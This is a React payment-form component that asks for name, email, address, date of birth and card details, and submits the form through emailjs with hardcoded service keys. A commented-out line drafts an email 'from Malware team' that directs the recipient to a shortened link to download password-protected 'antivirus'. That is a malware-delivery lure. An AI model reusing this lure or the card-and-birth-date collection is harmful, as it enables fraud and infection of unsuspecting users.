import React from 'react'
import './css/Payment.css'
import emailjs from 'emailjs-com'

export default function Payment (props) {
  

  const { payment, tomail } = props
  const [cardN, setcardN] = React.useState('')
  const [cv, setCV] = React.useState('')
  const [exp, setexP] = React.useState('')
  const [exYear, setexpYear] = React.useState('')
  // const mail = 'mailto:' + tomail +'?subject=Your Link from Malware team!&body=Thankyou for availing this service, you can download antivirus via this link https://rb.gy/2m2oy and if it asks for password use this : H@$h8xv45Be safe and secure Team Dev23'

  function handleSubmit (e) {
    e.preventDefault()

    emailjs
      .sendForm(
        'service_1vb8q7o',
        'template_7iv15b6',
        e.target,
        'Z8pmvMXjT0gIlNEB3'
      )
      .then(res => {
        console.log(res.text)
      })
      .catch(err => console.log(err.text))
  }
  const isEnabled =
    cardN.length > 0 && cv.length > 0 && exp.length > 0 && exYear.length > 0

  return (
    <div>
      <div class='wrapper'>
        <h2>Payment Form</h2>
        <form onSubmit={handleSubmit}>
          <h4>Account</h4>
          <div class='input_group'>
            <div class='input_box'>
              <input
                type='text'
                placeholder='Full Name'
                required
                class='name'
                name="user_name"
              />
              <i class='fa fa-user icon'></i>
            </div>
            <div class='input_box'>
              <input
                type='text'
                placeholder='Name on Card'
                required
                class='name'
              />
              <i class='fa fa-user icon'></i>
            </div>
          </div>
          <div class='input_group'>
            <div class='input_box'>
              <input
                type='email'
                placeholder='Email Address'
                required
                class='name'
                name="user_email"
              />
              <i class='fa fa-envelope icon'></i>
            </div>
          </div>
          <div class='input_group'>
            <div class='input_box'>
              <input type='text' placeholder='Address' required class='name' />
              <i class='fa fa-map-marker icon' aria-hidden='true'></i>
            </div>
          </div>
          <div class='input_group'>
            <div class='input_box'>
              <input type='text' placeholder='City' required class='name' />
              <i class='fa fa-institution icon'></i>
            </div>
          </div>

          <div class='input_group'>
            <div class='input_box'>
              <h4>Date Of Birth</h4>
              <input type='text' placeholder='DD' required class='dob' />
              <input type='text' placeholder='MM' required class='dob' />
              <input type='text' placeholder='YYYY' required class='dob' />
            </div>
          </div>

          <div class='input_group'>
            <div class='input_box'>
              <h4>Payment Details</h4>
              <input type='radio' name='pay' class='radio' id='bc1' checked />
            </div>
          </div>
          <div class='input_group'>
            <div class='input_box'>
              <input
                type='tel'
                name=''
                class='name'
                value={cardN}
                onChange={e => {
                  setcardN(e.target.value)
                }}
                placeholder='Card Number 1111-2222-3333-4444'
                required
              />
              <i class='fa fa-credit-card icon'></i>
            </div>
          </div>
          <div class='input_group'>
            <div class='input_box'>
              <input
                type='tel'
                name=''
                class='name'
                placeholder='Card CVC 632'
                value={cv}
                onChange={e => {
                  setCV(e.target.value)
                }}
                required
              />
              <i class='fa fa-user icon'></i>
            </div>
          </div>
          <div class='input_group'>
            <div class='input_box'>
              <div class='input_box'>
                <input
                  type='number'
                  placeholder='Exp Month'
                  required
                  class='name'
                  value={exp}
                  onChange={e => {
                    setexP(e.target.value)
                  }}
                />
                <i class='fa fa-calendar icon' aria-hidden='true'></i>
              </div>
            </div>
            <div class='input_box'>
              <input
                type='number'
                placeholder='Exp Year'
                required
                class='name'
                value={exYear}
                onChange={e => {
                  setexpYear(e.target.value)
                }}
              />
              <i class='fa fa-calendar-o icon' aria-hidden='true'></i>
            </div>
          </div>
          <div className='input_box'>
            <>
              <h4 style={{ fontSize: '28px', padding: '1px' }}>Price</h4>
            </>
            <div
              style={{
                fontWeight: '100',
                fontSize: '25px',
                fontFamily: 'Times New Roman'
              }}
            >
              {payment.length === 0 ? 'Free of cost Enjoy ' : 'Rs ' + payment}
            </div>
          </div>
          <div class='input_group'>
            <div class='input_box'>
              <button
                type='submit'
                // onClick={() => {
                //   window.location = mail
                // }}
                value="Send"
                disabled={!isEnabled}
              >
                PAY NOW
              </button>
            </div>
          </div>
        </form>
      </div>
    </div>
  )
}
